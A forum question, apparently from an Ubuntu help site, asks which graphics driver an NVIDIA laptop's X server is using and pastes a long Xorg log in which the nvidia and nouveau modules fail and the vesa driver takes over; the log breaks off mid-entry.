403342	what graphics drivers are now in use on this nvidia card ?	given the following /var/log/xorg.0.log , which graphics driver is the x server currently using ? this log is too confusing for me to parse ( i had to snip hopefully irrelevant parts to be able to post the question ) : [ 42.851 ] x.org x server 1.11.3 release date : 2011-12-16 [ 42.851 ] x protocol version 11 , revision 0 [ 42.851 ] build operating system : linux 2.6.42-37-generic i686 ubuntu [ 42.851 ] current operating system : linux malou-laptop 3.2.0-57-generic # 87-ubuntu smp tue nov 12 21:38:12 utc 2013 i686 [ 42.851 ] kernel command line : boot_image=/boot/vmlinuz-3.2.0-57-generic root=uuid=4a8098b3-159d-490a-8216-fe5649d4c129 ro quiet splash [ 42.851 ] build date : 16 october 2013 04:45:22pm [ 42.851 ] xorg-server 2:1.11.4-0ubuntu10.14 ( for technical support please see http : //www.ubuntu.com/support ) [ 42.851 ] current version of pixman : 0.24.4 [ 42.851 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 42.851 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 42.851 ] ( == ) log file : `` /var/log/xorg.0.log '' , time : fri jan 10 10:00:25 2014 [ 42.947 ] ( == ) using config file : `` /etc/x11/xorg.conf '' [ 42.947 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 42.953 ] ( == ) no layout section . using the first screen section . [ 42.953 ] ( == ) no screen section available . using defaults . [ 42.953 ] ( ** ) | -- > screen `` default screen section '' ( 0 ) [ 42.953 ] ( ** ) | | -- > monitor `` < default monitor > '' [ 42.953 ] ( == ) no device specified for screen `` default screen section '' . using the first device section listed . [ 42.953 ] ( ** ) | | -- > device `` default device '' [ 42.953 ] ( == ) no monitor specified for screen `` default screen section '' . using a default monitor configuration . [ 42.953 ] ( == ) automatically adding devices [ 42.953 ] ( == ) automatically enabling devices [ 42.953 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 42.953 ] entry deleted from font path . [ 42.953 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/100dpi/ : unscaled , /usr/share/fonts/x11/75dpi/ : unscaled , /usr/share/fonts/x11/type1 , /usr/share/fonts/x11/100dpi , /usr/share/fonts/x11/75dpi , /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype , built-ins [ 42.953 ] ( == ) modulepath set to `` /usr/lib/i386-linux-gnu/xorg/extra-modules , /usr/lib/xorg/extra-modules , /usr/lib/xorg/modules '' [ 42.953 ] ( ii ) the server relies on udev to provide the list of input devices . if no devices become available , reconfigure udev or disable autoadddevices . [ 42.953 ] ( ii ) loader magic : 0x7b35a0 [ 42.953 ] ( ii ) module abi versions : [ 42.953 ] x.org ansi c emulation : 0.4 [ 42.953 ] x.org video driver : 11.0 [ 42.953 ] x.org xinput driver : 16.0 [ 42.953 ] x.org server extension : 6.0 [ 42.955 ] ( -- ) pci : * ( 0:1:0:0 ) 10de:0429:17aa:20d8 rev 161 , mem @ 0xd2000000/16777216 , 0xe0000000/268435456 , 0xd0000000/33554432 , i/o @ 0x00002000/128 [ 42.955 ] ( ii ) open acpi successful ( /var/run/acpid.socket ) [ 42.955 ] ( ww ) `` glamoregl '' will not be loaded unless you 've specified it to be loaded elsewhere . [ 42.955 ] ( ii ) `` extmod '' will be loaded by default . [ 42.955 ] ( ii ) `` dbe '' will be loaded by default . [ 42.955 ] ( ii ) `` glx '' will be loaded by default . [ 42.955 ] ( ii ) `` record '' will be loaded by default . [ 42.955 ] ( ii ) `` dri '' will be loaded by default . [ 42.955 ] ( ii ) `` dri2 '' will be loaded by default . [ 42.955 ] ( ii ) loadmodule : `` extmod '' [ 42.982 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libextmod.so [ 42.982 ] ( ii ) module extmod : vendor= '' x.org foundation '' [ 42.982 ] compiled for 1.11.3 , module version = 1.0.0 [ 42.982 ] module class : x.org server extension [ 42.982 ] abi class : x.org server extension , version 6.0 [ 42.982 ] ( ii ) loading extension mit-screen-saver [ 42.982 ] ( ii ) loading extension xfree86-vidmodeextension [ 42.982 ] ( ii ) loading extension xfree86-dga [ 42.982 ] ( ii ) loading extension dpms [ 42.982 ] ( ii ) loading extension xvideo [ 42.982 ] ( ii ) loading extension xvideo-motioncompensation [ 42.982 ] ( ii ) loading extension x-resource [ 42.982 ] ( ii ) loadmodule : `` dbe '' [ 42.982 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdbe.so [ 42.983 ] ( ii ) module dbe : vendor= '' x.org foundation '' [ 42.983 ] compiled for 1.11.3 , module version = 1.0.0 [ 42.983 ] module class : x.org server extension [ 42.983 ] abi class : x.org server extension , version 6.0 [ 42.983 ] ( ii ) loading extension double-buffer [ 42.983 ] ( ii ) loadmodule : `` glx '' [ 42.983 ] ( ii ) loading /usr/lib/i386-linux-gnu/xorg/extra-modules/libglx.so [ 50.773 ] ( ii ) module glx : vendor= '' nvidia corporation '' [ 50.773 ] compiled for 4.0.2 , module version = 1.0.0 [ 50.773 ] module class : x.org server extension [ 50.773 ] ( ii ) nvidia glx module 331.20 wed oct 30 17:53:40 pdt 2013 [ 50.773 ] ( ii ) loading extension glx [ 50.773 ] ( ii ) loadmodule : `` record '' [ 50.774 ] ( ii ) loading /usr/lib/xorg/modules/extensions/librecord.so [ 51.245 ] ( ii ) module record : vendor= '' x.org foundation '' [ 51.245 ] compiled for 1.11.3 , module version = 1.13.0 [ 51.245 ] module class : x.org server extension [ 51.245 ] abi class : x.org server extension , version 6.0 [ 51.245 ] ( ii ) loading extension record [ 51.245 ] ( ii ) loadmodule : `` dri '' [ 51.246 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri.so [ 51.246 ] ( ii ) module dri : vendor= '' x.org foundation '' [ 51.246 ] compiled for 1.11.3 , module version = 1.0.0 [ 51.246 ] abi class : x.org server extension , version 6.0 [ 51.246 ] ( ii ) loading extension xfree86-dri [ 51.246 ] ( ii ) loadmodule : `` dri2 '' [ 51.246 ] ( ii ) loading /usr/lib/xorg/modules/extensions/libdri2.so [ 51.246 ] ( ii ) module dri2 : vendor= '' x.org foundation '' [ 51.246 ] compiled for 1.11.3 , module version = 1.2.0 [ 51.246 ] abi class : x.org server extension , version 6.0 [ 51.246 ] ( ii ) loading extension dri2 [ 51.246 ] ( == ) matched nvidia as autoconfigured driver 0 [ 51.246 ] ( == ) matched nouveau as autoconfigured driver 1 [ 51.246 ] ( == ) matched nv as autoconfigured driver 2 [ 51.246 ] ( == ) matched vesa as autoconfigured driver 3 [ 51.246 ] ( == ) matched fbdev as autoconfigured driver 4 [ 51.246 ] ( == ) assigned the driver to the xf86configlayout [ 51.246 ] ( ii ) loadmodule : `` nvidia '' [ 51.246 ] ( ii ) loading /usr/lib/i386-linux-gnu/xorg/extra-modules/nvidia_drv.so [ 51.669 ] ( ii ) module nvidia : vendor= '' nvidia corporation '' [ 51.669 ] compiled for 4.0.2 , module version = 1.0.0 [ 51.669 ] module class : x.org video driver [ 51.687 ] ( ii ) loadmodule : `` nouveau '' [ 51.688 ] ( ii ) loading /usr/lib/xorg/modules/drivers/nouveau_drv.so [ 51.688 ] ( ii ) module nouveau : vendor= '' x.org foundation '' [ 51.688 ] compiled for 1.11.3 , module version = 0.0.16 [ 51.688 ] module class : x.org video driver [ 51.688 ] abi class : x.org video driver , version 11.0 [ 51.688 ] ( ii ) loadmodule : `` nv '' [ 51.714 ] ( ww ) warning , could n't open module nv [ 51.714 ] ( ii ) unloadmodule : `` nv '' [ 51.714 ] ( ii ) unloading nv [ 51.714 ] ( ee ) failed to load module `` nv '' ( module does not exist , 0 ) [ 51.714 ] ( ii ) loadmodule : `` vesa '' [ 51.714 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 51.715 ] ( ii ) module vesa : vendor= '' x.org foundation '' [ 51.715 ] compiled for 1.11.3 , module version = 2.3.0 [ 51.715 ] module class : x.org video driver [ 51.715 ] abi class : x.org video driver , version 11.0 [ 51.715 ] ( ii ) loadmodule : `` fbdev '' [ 51.715 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so [ 51.715 ] ( ii ) module fbdev : vendor= '' x.org foundation '' [ 51.715 ] compiled for 1.11.3 , module version = 0.4.2 [ 51.715 ] abi class : x.org video driver , version 11.0 [ 51.715 ] ( == ) matched nvidia as autoconfigured driver 0 [ 51.715 ] ( == ) matched nouveau as autoconfigured driver 1 [ 51.715 ] ( == ) matched nv as autoconfigured driver 2 [ 51.715 ] ( == ) matched vesa as autoconfigured driver 3 [ 51.715 ] ( == ) matched fbdev as autoconfigured driver 4 [ 51.715 ] ( == ) assigned the driver to the xf86configlayout [ 51.715 ] ( ii ) loadmodule : `` nvidia '' [ 51.715 ] ( ii ) loading /usr/lib/i386-linux-gnu/xorg/extra-modules/nvidia_drv.so [ 51.715 ] ( ii ) module nvidia : vendor= '' nvidia corporation '' [ 51.990 ] compiled for 4.0.2 , module version = 1.0.0 [ 51.990 ] module class : x.org video driver [ 51.990 ] ( ii ) unloadmodule : `` nvidia '' [ 51.990 ] ( ii ) unloading nvidia [ 51.990 ] ( ii ) failed to load module `` nvidia '' ( already loaded , 7838747 ) [ 51.990 ] ( ii ) loadmodule : `` nouveau '' [ 51.990 ] ( ii ) loading /usr/lib/xorg/modules/drivers/nouveau_drv.so [ 51.990 ] ( ii ) module nouveau : vendor= '' x.org foundation '' [ 51.990 ] compiled for 1.11.3 , module version = 0.0.16 [ 51.990 ] module class : x.org video driver [ 51.990 ] abi class : x.org video driver , version 11.0 [ 51.991 ] ( ii ) unloadmodule : `` nouveau '' [ 51.991 ] ( ii ) unloading nouveau [ 51.991 ] ( ii ) failed to load module `` nouveau '' ( already loaded , 7838747 ) [ 51.991 ] ( ii ) loadmodule : `` nv '' [ 51.991 ] ( ww ) warning , could n't open module nv [ 51.991 ] ( ii ) unloadmodule : `` nv '' [ 51.991 ] ( ii ) unloading nv [ 51.991 ] ( ee ) failed to load module `` nv '' ( module does not exist , 0 ) [ 51.991 ] ( ii ) loadmodule : `` vesa '' [ 51.992 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 51.992 ] ( ii ) module vesa : vendor= '' x.org foundation '' [ 51.992 ] compiled for 1.11.3 , module version = 2.3.0 [ 51.992 ] module class : x.org video driver [ 51.992 ] abi class : x.org video driver , version 11.0 [ 51.992 ] ( ii ) unloadmodule : `` vesa '' [ 51.992 ] ( ii ) unloading vesa [ 51.992 ] ( ii ) failed to load module `` vesa '' ( already loaded , 0 ) [ 51.992 ] ( ii ) loadmodule : `` fbdev '' [ 51.992 ] ( ii ) loading /usr/lib/xorg/modules/drivers/fbdev_drv.so [ 51.992 ] ( ii ) module fbdev : vendor= '' x.org foundation '' [ 51.992 ] compiled for 1.11.3 , module version = 0.4.2 [ 51.992 ] abi class : x.org video driver , version 11.0 [ 51.992 ] ( ii ) unloadmodule : `` fbdev '' [ 51.992 ] ( ii ) unloading fbdev [ 51.992 ] ( ii ) failed to load module `` fbdev '' ( already loaded , 0 ) [ 52.100 ] ( ii ) nvidia dlloader x driver 331.20 wed oct 30 17:32:26 pdt 2013 [ 52.100 ] ( ii ) nvidia unified driver for all supported nvidia gpus [ 52.123 ] ( ii ) nouveau driver date : wed nov 30 18:56:54 2011 +0100 [ 52.123 ] ( ii ) nouveau driver for nvidia chipset families : [ 52.123 ] riva tnt ( nv04 ) [ 52.123 ] riva tnt2 ( nv05 ) [ 52.123 ] geforce 256 ( nv10 ) [ 52.123 ] geforce 2 ( nv11 , nv15 ) [ 52.123 ] geforce 4mx ( nv17 , nv18 ) [ 52.123 ] geforce 3 ( nv20 ) [ 52.123 ] geforce 4ti ( nv25 , nv28 ) [ 52.123 ] geforce fx ( nv3x ) [ 52.123 ] geforce 6 ( nv4x ) [ 52.123 ] geforce 7 ( g7x ) [ 52.123 ] geforce 8 ( g8x ) [ 52.123 ] geforce gtx 200 ( nva0 ) [ 52.124 ] geforce gtx 400 ( nvc0 ) [ 52.124 ] ( ii ) vesa : driver for vesa chipsets : vesa [ 52.124 ] ( ii ) fbdev : driver for framebuffer : fbdev [ 52.124 ] ( ++ ) using vt number 7 [ 52.132 ] ( ii ) loading sub module `` fb '' [ 52.132 ] ( ii ) loadmodule : `` fb '' [ 52.133 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 52.133 ] ( ii ) module fb : vendor= '' x.org foundation '' [ 52.133 ] compiled for 1.11.3 , module version = 1.0.0 [ 52.133 ] abi class : x.org ansi c emulation , version 0.4 [ 52.133 ] ( ii ) loading sub module `` wfb '' [ 52.133 ] ( ii ) loadmodule : `` wfb '' [ 52.133 ] ( ii ) loading /usr/lib/xorg/modules/libwfb.so [ 52.186 ] ( ii ) module wfb : vendor= '' x.org foundation '' [ 52.186 ] compiled for 1.11.3 , module version = 1.0.0 [ 52.186 ] abi class : x.org ansi c emulation , version 0.4 [ 52.186 ] ( ii ) loading sub module `` ramdac '' [ 52.186 ] ( ii ) loadmodule : `` ramdac '' [ 52.186 ] ( ii ) module `` ramdac '' already built-in [ 52.383 ] ( ee ) nvidia : failed to load the nvidia kernel module . please check your [ 52.383 ] ( ee ) nvidia : system 's kernel log for additional error messages . [ 52.383 ] drmopendevice : node name is /dev/dri/card0 [ 52.392 ] [ drm ] failed to load kernel module `` nouveau '' [ 52.392 ] ( ee ) [ drm ] failed to open device [ 52.392 ] drmopendevice : node name is /dev/dri/card0 [ 52.401 ] [ drm ] failed to load kernel module `` nouveau '' [ 52.401 ] ( ee ) [ drm ] failed to open device [ 52.401 ] ( ii ) loading /usr/lib/xorg/modules/drivers/vesa_drv.so [ 52.401 ] ( ww ) falling back to old probe method for fbdev [ 52.401 ] ( ii ) loading sub module `` fbdevhw '' [ 52.401 ] ( ii ) loadmodule : `` fbdevhw '' [ 52.401 ] ( ii ) loading /usr/lib/xorg/modules/libfbdevhw.so [ 52.401 ] ( ii ) module fbdevhw : vendor= '' x.org foundation '' [ 52.401 ] compiled for 1.11.3 , module version = 0.0.2 [ 52.402 ] abi class : x.org video driver , version 11.0 [ 52.402 ] ( ee ) open /dev/fb0 : no such file or directory [ 52.402 ] ( ii ) loading sub module `` vbe '' [ 52.402 ] ( ii ) loadmodule : `` vbe '' [ 52.402 ] ( ii ) loading /usr/lib/xorg/modules/libvbe.so [ 52.402 ] ( ii ) module vbe : vendor= '' x.org foundation '' [ 52.402 ] compiled for 1.11.3 , module version = 1.1.0 [ 52.402 ] abi class : x.org video driver , version 11.0 [ 52.402 ] ( ii ) loading sub module `` int10 '' [ 52.402 ] ( ii ) loadmodule : `` int10 '' [ 52.402 ] ( ii ) loading /usr/lib/xorg/modules/libint10.so [ 52.402 ] ( ii ) module int10 : vendor= '' x.org foundation '' [ 52.402 ] compiled for 1.11.3 , module version = 1.0.0 [ 52.402 ] abi class : x.org video driver , version 11.0 [ 52.403 ] ( ii ) vesa ( 0 ) : initializing int10 [ 52.403 ] ( ii ) vesa ( 0 ) : primary v_bios segment is : 0xc000 [ 52.467 ] ( ii ) vesa ( 0 ) : vesa bios detected [ 52.467 ] ( ii ) vesa ( 0 ) : vesa vbe version 3.0 [ 52.467 ] ( ii ) vesa ( 0 ) : vesa vbe total mem : 14336 kb [ 52.467 ] ( ii ) vesa ( 0 ) : vesa vbe oem : nvidia [ 52.467 ] ( ii ) vesa ( 0 ) : vesa vbe oem software rev : 96.134 [ 52.467 ] ( ii ) vesa ( 0 ) : vesa vbe oem vendor : nvidia corporation [ 52.467 ] ( ii ) vesa ( 0 ) : vesa vbe oem product : g86 board - nv_nb8m [ 52.467 ] ( ii ) vesa ( 0 ) : vesa vbe oem product rev : chip rev [ 52.588 ] ( ii ) vesa ( 0 ) : creating default display subsection in screen section `` default screen section '' for depth/fbbpp 24/32 [ 52.588 ] ( == ) vesa ( 0 ) : depth 24 , ( -- ) framebuffer bpp 32 [ 52.588 ] ( == ) vesa ( 0 ) : rgb weight 888 [ 52.588 ] ( == ) vesa ( 0 ) : default visual is truecolor [ 52.588 ] ( == ) vesa ( 0 ) : using gamma correction ( 1.0 , 1.0 , 1.0 ) [ 52.588 ] ( ii ) loading sub module `` ddc '' [ 52.588 ] ( ii ) loadmodule : `` ddc '' [ 52.588 ] ( ii ) module `` ddc '' already built-in [ 52.655 ] ( ii ) vesa ( 0 ) : vesa vbe ddc supported [ 52.655 ] ( ii ) vesa ( 0 ) : vesa vbe ddc level none [ 52.655 ] ( ii ) vesa ( 0 ) : vesa vbe ddc transfer in appr . 0 sec . [ 52.925 ] ( ii ) vesa ( 0 ) : vesa vbe ddc read failed [ 53.009 ] ( ii ) vesa ( 0 ) : vesa vbe panelid read successfully [ 53.009 ] ( ii ) vesa ( 0 ) : panelid returned panel resolution 1680x1050 [ 53.009 ] ( ii ) vesa ( 0 ) : searching for matching vesa mode ( s ) : [ 53.010 ] mode : 100 ( 640x400 ) [ 53.010 ] modeattributes : 0x3bf [ 53.011 ] winaattributes : 0x7 [ 53.011 ] winbattributes : 0x0 [ 53.011 ] wingranularity : 64 [ .. ] [ 53.078 ] bnknumberofimagepages : 1 [ 53.078 ] linnumberofimagepages : 1 [ 53.078 ] linredmasksize : 8 [ 53.078 ] linredfieldposition : 16 [ 53.078 ] lingreenmasksize : 8 [ 53.078 ] lingreenfieldposition : 8 [ 53.078 ] linbluemasksize : 8 [ 53.078 ] linbluefieldposition : 0 [ 53.078 ] linrsvdmasksize : 8 [ 53.078 ] linrsvdfieldposition : 24 [ 53.078 ] maxpixelclock : 229500000 [ 53.078 ] [ 53.078 ] ( ii ) vesa ( 0 ) : total memory : 224 64kb banks ( 14336kb ) [ 53.078 ] ( ii ) vesa ( 0 ) : < default monitor > : using hsync range of 29.37-64.67 khz [ 53.078 ] ( ii ) vesa ( 0 ) : < default monitor > : using vrefresh range of 56.00-59.88 hz [ 53.078 ] ( ww ) vesa ( 0 ) : unable to estimate virtual size [ 53.078 ] ( ii ) vesa ( 0 ) : not using built-in mode `` 1680x1050 '' ( no mode of this name ) [ 53.078 ] ( ii ) vesa ( 0 ) : not using built-in mode `` 1280x1024 '' ( no mode of this name ) [ 53.078 ] ( ii ) vesa ( 0 ) : not using built-in mode `` 1280x800 '' ( no mode of this name ) [ 53.078 ] ( ii ) vesa ( 0 ) : not using built-in mode `` 1024x768 '' ( no mode of this name ) [ 53.078 ] ( ii ) vesa ( 0 ) : not using built-in mode `` 800x600 '' ( no mode of this name ) [ 53.078 ] ( ii ) vesa ( 0 ) : not using built-in mode `` 640x480 '' ( no mode of this name ) [ 53.078 ] ( ii ) vesa ( 0 ) : not using built-in mode `` 640x400 '' ( no mode of this name ) [ 53.078 ] ( ii ) vesa ( 0 ) : not using built-in mode `` 320x400 '' ( no mode of this name ) [ 53.078 ] ( ii ) vesa ( 0 ) : not using built-in mode `` 320x240 '' ( no mode of this name ) [ 53.078 ] ( ii ) vesa ( 0 ) : not using built-in mode `` 320x200 '' ( no mode of this name ) [ 53.078 ] ( ww ) vesa ( 0 ) : no valid modes left . trying less strict filter ... [ 53.078 ] ( ii ) vesa ( 0 ) : < default monitor > : using hsync range of 29.37-64.67 khz [ 53.078 ] ( ii ) vesa ( 0 ) : < default monitor > : using vrefresh range of 56.00-59.88 hz [ 53.078 ] ( ww ) vesa ( 0 ) : unable to estimate virtual size [ 53.078 ] ( ii ) vesa ( 0 ) : not using built-in mode `` 640x400 '' ( hsync out of range ) [ 53.078 ] ( ii ) vesa ( 0 ) : not using built-in mode `` 320x400 '' ( hsync out of range ) [ 53.078 ] ( ii ) vesa ( 0 ) : not using built-in mode `` 320x240 '' ( illegal horizontal timings ) [ 53.078 ] ( ii ) vesa ( 0 ) : not using built-in mode `` 320x200 '' ( illegal horizontal timings ) [ 53.078 ] ( -- ) vesa ( 0 ) : virtual size is 1680x1050 ( pitch 1680 ) [ 53.078 ] ( ** ) vesa ( 0 ) : *built-in mode `` 1680x1050 '' [ 53.078 ] ( ** ) vesa ( 0 ) : *built-in mode `` 1280x1024 '' [ 53.079 ] ( ** ) vesa ( 0 ) : *built-in mode `` 1280x800 '' [ 53.079 ] ( ** ) vesa ( 0 ) : *built-in mode `` 1024x768 '' [ 53.079 ] ( ** ) vesa ( 0 ) : *built-in mode `` 800x600 '' [ 53.079 ] ( ** ) vesa ( 0 ) : *built-in mode `` 640x480 '' [ 53.079 ] ( == ) vesa ( 0 ) : dpi set to ( 96 , 96 ) [ 53.079 ] ( ii ) vesa ( 0 ) : attempting to use 60hz refresh for mode `` 1680x1050 '' ( 169 ) [ 53.080 ] ( ii ) vesa ( 0 ) : attempting to use 60hz refresh for mode `` 1280x1024 '' ( 11b ) [ 53.080 ] ( ii ) vesa ( 0 ) : attempting to use 60hz refresh for mode `` 1024x768 '' ( 118 ) [ 53.081 ] ( ii ) vesa ( 0 ) : attempting to use 60hz refresh for mode `` 800x600 '' ( 115 ) [ 53.082 ] ( ii ) vesa ( 0 ) : attempting to use 60hz refresh for mode `` 640x480 '' ( 112 ) [ 53.083 ] ( ** ) vesa ( 0 ) : using `` shadow framebuffer '' [ 53.083 ] ( ii ) loading sub module `` shadow '' [ 53.083 ] ( ii ) loadmodule : `` shadow '' [ 53.084 ] ( ii ) loading /usr/lib/xorg/modules/libshadow.so [ 53.084 ] ( ii ) module shadow : vendor= '' x.org foundation '' [ 53.084 ] compiled for 1.11.3 , module version = 1.1.0 [ 53.084 ] abi class : x.org ansi c emulation , version 0.4 [ 53.084 ] ( ii ) loading sub module `` fb '' [ 53.084 ] ( ii ) loadmodule : `` fb '' [ 53.084 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 53.084 ] ( ii ) module fb : vendor= '' x.org foundation '' [ 53.084 ] compiled for 1.11.3 , module version = 1.0.0 [ 53.084 ] abi class : x.org ansi c emulation , version 0.4 [ 53.084 ] ( ii ) unloadmodule : `` fbdev '' [ 53.084 ] ( ii ) unloading fbdev [ 53.084 ] ( ii ) unloadmodule : `` fbdevhw '' [ 53.084 ] ( ii ) unloading fbdevhw [ 53.084 ] ( == ) depth 24 pixmap format is 32 bpp [ 53.084 ] ( ii ) loading sub module `` int10 '' [ 53.085 ] ( ii ) loadmodule : `` int10 '' [ 53.085 ] ( ii ) loading /usr/lib/xorg/modules/libint10.so [ 53.085 ] ( ii ) module int10 : vendor= '' x.org foundation '' [ 53.085 ] compiled for 1.11.3 , module version = 1.0.0 [ 53.085 ] abi class : x.org video driver , version 11.0 [ 53.085 ] ( ii ) vesa ( 0 ) : initializing int10 [ 53.085 ] ( ii ) vesa ( 0 ) : primary v_bios segment is : 0xc000 [ 53.147 ] ( ii ) vesa ( 0 ) : vesa bios detected [ 53.147 ] ( ii ) vesa ( 0 ) : vesa vbe version 3.0 [ 53.147 ] ( ii ) vesa ( 0 ) : vesa vbe total mem : 14336 kb [ 53.147 ] ( ii ) vesa ( 0 ) : vesa vbe oem : nvidia [ 53.147 ] ( ii ) vesa ( 0 ) : vesa vbe oem software rev : 96.134 [ 53.147 ] ( ii ) vesa ( 0 ) : vesa vbe oem vendor : nvidia corporation [ 53.147 ] ( ii ) vesa ( 0 ) : vesa vbe oem product : g86 board - nv_nb8m [ 53.147 ] ( ii ) vesa ( 0 ) : vesa vbe oem product rev : chip rev [ 53.150 ] ( ii ) vesa ( 0 ) : virtual address = 0xb67be000 , physical address = 0xd1000000 , size = 14680064 [ 53.172 ] ( ii ) vesa ( 0 ) : setting up vesa mode 0x169 ( 1680x1050 ) [ 53.382 ] ( == ) vesa ( 0 ) : default visual is truecolor [ 53.383 ] ( == ) vesa ( 0 ) : backing store disabled [ 53.383 ] ( == ) vesa ( 0 ) : dpms enabled [ 53.383 ] ( ww ) vesa ( 0 ) : option `` nologo '' is not used [ 53.383 ] ( == ) randr enabled [ 53.383 ] ( ii ) initializing built-in extension generic event extension [ 53.383 ] ( ii ) initializing built-in extension shape [ 53.383 ] ( ii ) initializing built-in extension mit-shm [ 53.383 ] ( ii ) initializing built-in extension xinputextension [ 53.383 ] ( ii ) initializing built-in extension xtest [ 53.383 ] ( ii ) initializing built-in extension big-requests [ 53.383 ] ( ii ) initializing built-in extension sync [ 53.383 ] ( ii ) initializing built-in extension xkeyboard [ 53.383 ] ( ii ) initializing built-in extension xc-misc [ 53.383 ] ( ii ) initializing built-in extension security [ 53.383 ] ( ii ) initializing built-in extension xinerama [ 53.383 ] ( ii ) initializing built-in extension xfixes [ 53.383 ] ( ii ) initializing built-in extension render [ 53.383 ] ( ii ) initializing built-in extension randr [ 53.383 ] ( ii ) initializing built-in extension composite [ 53.383 ] ( ii ) initializing built-in extension damage [ 53.407 ] ( ee ) failed to initialize glx extension ( compatible nvidia x driver not found ) [ 53.445 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-b20d7fc79c7f597315e3e501aef10e0d866e8e92.xkm [ 53.449 ] ( ii ) config/udev : adding input device power button ( /dev/input/event2 ) [ 53.449 ] ( ** ) power button : applying inputclass `` evdev keyboard catchall '' [ 53.449 ] ( ii ) loadmodule : `` evdev '' [ 53.450 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 53.450 ] ( ii ) module evdev : vendor= '' x.org foundation '' [ 53.450 ] compiled for 1.11.3 , module version = 2.7.0 [ 53.450 ] module class : x.org xinput driver [ 53.450 ] abi class : x.org xinput driver , version 16.0 [ 53.450 ] ( ii ) using input driver 'evdev ' for 'power button' [ 53.450 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 53.450 ] ( ** ) power button : always reports core events [ 53.450 ] ( ** ) evdev : power button : device : `` /dev/input/event2 '' [ 53.450 ] ( -- ) evdev : power button : vendor 0 product 0x1 [ 53.450 ] ( -- ) evdev : power button : found keys [ 53.450 ] ( ii ) evdev : power button : configuring as keyboard [ 53.450 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/lnxpwrbn:00/input/input2/event2 '' [ 53.450 ] ( ii ) xinput : adding extended input device `` power button '' ( type : keyboard , id 6 ) [ 53.450 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 53.450 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 53.450 ] ( ** ) option `` xkb_layout '' `` us '' [ 53.451 ] ( ii ) config/udev : adding input device video bus ( /dev/input/event4 ) [ 53.451 ] ( ** ) video bus : applying inputclass `` evdev keyboard catchall '' [ 53.451 ] ( ii ) using input driver 'evdev ' for 'video bus' [ 53.451 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 53.451 ] ( ** ) video bus : always reports core events [ 53.451 ] ( ** ) evdev : video bus : device : `` /dev/input/event4 '' [ 53.451 ] ( -- ) evdev : video bus : vendor 0 product 0x6 [ 53.451 ] ( -- ) evdev : video bus : found keys [ 53.451 ] ( ii ) evdev : video bus : configuring as keyboard [ 53.451 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/lnxsybus:00/pnp0a08:00/device:04/lnxvideo:01/input/input4/event4 '' [ 53.451 ] ( ii ) xinput : adding extended input device `` video bus '' ( type : keyboard , id 7 ) [ 53.451 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 53.451 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 53.451 ] ( ** ) option `` xkb_layout '' `` us '' [ 53.452 ] ( ii ) config/udev : adding input device lid switch ( /dev/input/event0 ) [ 53.452 ] ( ii ) no input driver specified , ignoring this device . [ 53.452 ] ( ii ) this device may have been added with another device file . [ 53.452 ] ( ii ) config/udev : adding input device sleep button ( /dev/input/event1 ) [ 53.452 ] ( ** ) sleep button : applying inputclass `` evdev keyboard catchall '' [ 53.452 ] ( ii ) using input driver 'evdev ' for 'sleep button' [ 53.452 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 53.452 ] ( ** ) sleep button : always reports core events [ 53.452 ] ( ** ) evdev : sleep button : device : `` /dev/input/event1 '' [ 53.452 ] ( -- ) evdev : sleep button : vendor 0 product 0x3 [ 53.452 ] ( -- ) evdev : sleep button : found keys [ 53.452 ] ( ii ) evdev : sleep button : configuring as keyboard [ 53.453 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/lnxsybus:00/pnp0c0e:00/input/input1/event1 '' [ 53.453 ] ( ii ) xinput : adding extended input device `` sleep button '' ( type : keyboard , id 8 ) [ 53.453 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 53.453 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 53.453 ] ( ** ) option `` xkb_layout '' `` us '' [ .. ] [ 53.453 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ .. ] [ 53.453 ] ( ** ) option `` config_info '' `` udev : /sys/devices/platform/i8042/serio0/input/input3/event3 '' [ 53.453 ] ( ii ) xinput : adding extended input device `` at translated set 2 keyboard '' ( type : keyboard , id 9 ) [ 53.454 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 53.454 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 53.454 ] ( ** ) option `` xkb_layout '' `` us '' [ 53.454 ] ( ii ) config/udev : adding input device synps/2 synaptics touchpad ( /dev/input/event5 ) [ 53.454 ] ( ** ) synps/2 synaptics touchpad : applying inputclass `` evdev touchpad catchall '' [ 53.454 ] ( ** ) synps/2 synaptics touchpad : applying inputclass `` touchpad catchall '' [ 53.454 ] ( ii ) loadmodule : `` synaptics '' [ 53.455 ] ( ii ) loading /usr/lib/xorg/modules/input/synaptics_drv.so [ 53.455 ] ( ii ) module synaptics : vendor= '' x.org foundation '' [ 53.455 ] compiled for 1.11.3 , module version = 1.6.2 [ 53.455 ] module class : x.org xinput driver [ 53.455 ] abi 